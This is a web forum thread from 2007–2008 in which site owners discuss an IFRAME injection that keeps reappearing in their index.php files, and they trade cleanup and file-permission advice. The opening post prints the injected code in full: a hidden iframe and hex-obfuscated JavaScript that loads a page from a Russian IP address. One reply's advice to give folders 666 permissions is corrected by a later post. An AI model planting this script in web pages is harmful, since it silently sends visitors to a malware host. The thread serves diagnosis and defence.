1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

IFRAME homepage Insertion

Discussion in 'Security' started by Imran, Dec 10, 2007.

  1. #1
    We just had some weird script installed on our index.php file of
    domain.com which has been removed.. Some details of what this is can be
    found at:

    http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS_IFRAME.CW&VSect=P

    The Iframe that is inserted into the index.php is:
    <iframe src='http://url' width='1' height='1'
    style='visibility: hidden;'></iframe><script>function
    v475c44d384a1a(v475c44d3851e7){ function v475c44d3859b9 () {return 16;}
    return(parseInt(v475c44d3851e7,v475c44d3859b9()));}function
    v475c44d386957(v475c44d38712a){ var v475c44d38889a=2; var
    v475c44d3878f8='';for(v475c44d3880c3=0;
    v475c44d3880c3<v475c44d38712a.length; v475c44d3880c3+=v475c44d38889a){
    v475c44d3878f8+=(String.fromCharCode(v475c44d384a1a(v475c44d38712a.substr(v475c44d3880c3,
    v475c44d38889a))));}return v475c44d3878f8;}
    document.write(v475c44d386957('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D33653131207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3237373932292B2761373532643866335C272077696474683D3438206865696768743D353739207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    
    Code (markup):
    The above javascript is a encrypted code which takes you to a IP address hosted in Russia.
    77.221.133.188.addr.datapoint.ru [77.221.133.188 ]
    That is datapoint.ru is the datacenter, this include has a Virus in the site which is installed in index.php. This is been really happening on many sites, every day I have to get up and change index.php file on many sites, I have all permissions set up fine.
    The hijackthis, log seems to be fine too.
    I scanned my system looks fine.
    For some information about this you can look here as well.
    http://www.google.com/search?q=<ifr...avclient-ff&ie=UTF-8&rlz=1B3GGGL_enIN249IN249

    Can any one provide some sort of a solution to this problem.
    Thanks.
     
    Imran, Dec 10, 2007 IP
  2. svsanchez

    svsanchez Active Member

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #2
    We are having the same problem, the code gets inserted twice a day on all index and default pages, we have to continually remove it manually. We just banned the IP you mentionned above but I'm not sure this is going to solve it. Maybe a tomahawk at the russian server hosting the virus?
     
    svsanchez, Dec 12, 2007 IP
  3. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #3
    Hey man after lot of research I found the solution to this problem, since three servers were infected had to do some research.
    Your website is infected with Virus, You must have kept some folders open with 777 permissions, please check for index.html which will be about 1kb also index.php about 1kb that has the virus /trojan which keeps inserting again and again and again.
    Better delete those files ad replace them with older backups.
     
    Imran, Dec 12, 2007 IP
  4. svsanchez

    svsanchez Active Member

    Messages:
    4
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    51
    #4
    Hey Imran, thx for the tip. I found a folder with 777 permission so I changed it and removed the code from all index and default files. Another file that gets the code inserted is login.php, I assume that all login files regardless of their extension will also be affected. Hope this ends this nightmare, and really somebody should shut down that russian server!!!
     
    svsanchez, Dec 12, 2007 IP
  5. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #5
    I suggest you to change your FTP/Cpanel Passwords, just in case.
     
    Imran, Dec 12, 2007 IP
  6. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #6
    The Trojan / Virus also Works on home.php, default.php, index.php, similarly on html, and other formats.
    The best bet would be to download your site scan with Latest kaspersky Antivirus patterns and reupload the site. if you have a site which is very big, in size then you have to work lot.

    Note: This Virus/trojan does not write into deep inside the folders.
    It just writes in the following describe method:
    www/index.html
    www/folder1/index.html
    www/fodler2/index.html
    www/.../index.html

    It does not write into
    www/folder1/folder_inside_folder1/ << does not infect here.
    hence you would just need to download infected files and scan them.
     
    Imran, Dec 16, 2007 IP
  7. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #7
    Imran, Dec 17, 2007 IP
  8. kmofo

    kmofo Active Member

    Messages:
    442
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    85
    #8
    I'm experiencing the same problem, but i don't have access to cpanel update. Is changing permissions to folders and replacing the infected files enough?
     
    kmofo, Apr 4, 2008 IP
  9. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #9
    There are manythings to be done, basic is permissions related make sure you remove all infected files and change File permissions to 444 and folders to 666
     
    Imran, Apr 6, 2008 IP
  10. Ladadadada

    Ladadadada Peon

    Messages:
    382
    Likes Received:
    36
    Best Answers:
    0
    Trophy Points:
    0
    #10
    Folders should be 755, not 666. 666 permissions will mean that you can't look inside the folder. You will be able to read the folder itself and write new file inside the folder but you won't be able to "cd" into the folder or "ls" the folder. This will probably also mean that Apache can't serve the files in those folders.

    755 permissions will allow you to do everything inside the folder but everyone else will only be able to read and look inside the folder. This means that if a new file is created, you will know that whoever did it either has a way into your account or the root account. If an existing file changes in those directories then you will need to check the ownership of the file that was changed.

    644 permissions for files is pretty much the same thing as 755 for directories. Only you can change the file but anyone can read it. As before, this means that if the file has changed, the attacker has either got your account or the root account.

    If a file is owned by nobody or has world-writable permissions then the attacker may only have a PHP inclusion vulnerability rather than having an account on your system. This would still be bad but it's not quite as bad because the attacker would be limited in the things he could do.
     
    Ladadadada, Apr 8, 2008 IP
    Bohol likes this.
  11. kmofo

    kmofo Active Member

    Messages:
    442
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    85
    #11
    Thanks guys! Done what you suggested and now it's all ok!
     
    kmofo, Apr 13, 2008 IP
  12. Breakaway11

    Breakaway11 Well-Known Member

    Messages:
    882
    Likes Received:
    27
    Best Answers:
    0
    Trophy Points:
    120
    #12
    I had the same problem and I did what you guys suggested!! This is such an awesome forum!

    I can't believe these links were hidden in my page! SEO Black hat link building sucks!
     
    Breakaway11, Apr 18, 2008 IP
  13. MoneyMoose

    MoneyMoose Peon

    Messages:
    683
    Likes Received:
    21
    Best Answers:
    0
    Trophy Points:
    0
    #13
    Thanks for the helpful info + heads-up - checked out my sites and they seem clean but you never know...
     
    MoneyMoose, Apr 18, 2008 IP
  14. baybossplaya

    baybossplaya Active Member

    Messages:
    597
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    58
    #14
    what a goldmine!
     
    baybossplaya, Apr 19, 2008 IP
  15. Imran

    Imran Notable Member

    Messages:
    2,340
    Likes Received:
    190
    Best Answers:
    0
    Trophy Points:
    230
    #15
    Glad this thread is helping so many of you.
    You should always be aware of permissions your website : Folders / Files have, who has the permission to execuite and who has the permission to read/write. This Information and proper permissions will make you safe from these IFRAME Attacks.

    Recently one my clients website had another Iframe attack which was redirecting it to iloveads.myspace.com from x0ss.info website, a IFRAME Attack any one who have such attack look into your template/files with 777 permissions. change it back to 444 for files to avoid any such future attacks.
     
    Imran, Apr 22, 2008 IP
  16. amoona

    amoona Peon

    Messages:
    56
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #16
    Good post. Thank you man, it helps me a lot!
     
    amoona, May 26, 2008 IP
  17. andyoudontstop

    andyoudontstop Peon

    Messages:
    42
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #17
    andyoudontstop, Jun 18, 2008 IP
  18. Varsys Inc.

    Varsys Inc. Peon

    Messages:
    51
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #18
    777 permissions permissions for files on a web server is the invitation for a hacker to alter the content of your files. Securing it is a must.
    The easiest way to maintain proper permissions is to set it up on a higher level directory and have them always inherited for subfolders and files.
    Good luck!
     
    Varsys Inc., Nov 7, 2008 IP
  19. killer2021

    killer2021 Peon

    Messages:
    872
    Likes Received:
    14
    Best Answers:
    0
    Trophy Points:
    0
    #19
    Interesting, I am going to look into this!
     
    killer2021, Nov 9, 2008 IP
  20. JavaPF

    JavaPF Member

    Messages:
    62
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    41
    #20
    This is also happening to my server and it is not due to CHMOD issues.

    I have uninstalled every single script that I had running. The only thing I have left which is essential is vBulletin.

    Do you other effected people also run vBulletin?

    As there is nothing else left on my server but vBulletin, I'm pretty sure this is happening due to a php injection exploit. Maybe not in vBulletin itself but with one of the add-ons or modifications.

    This is very interesting although annoying!! Its obviousally some sort of automated attack as not long after removing the injected html, it comes back again.

    Please keep this thread updated with any new information. I will be sure to post my solution when I eventually find the real security hole.
     
    JavaPF, Dec 22, 2008 IP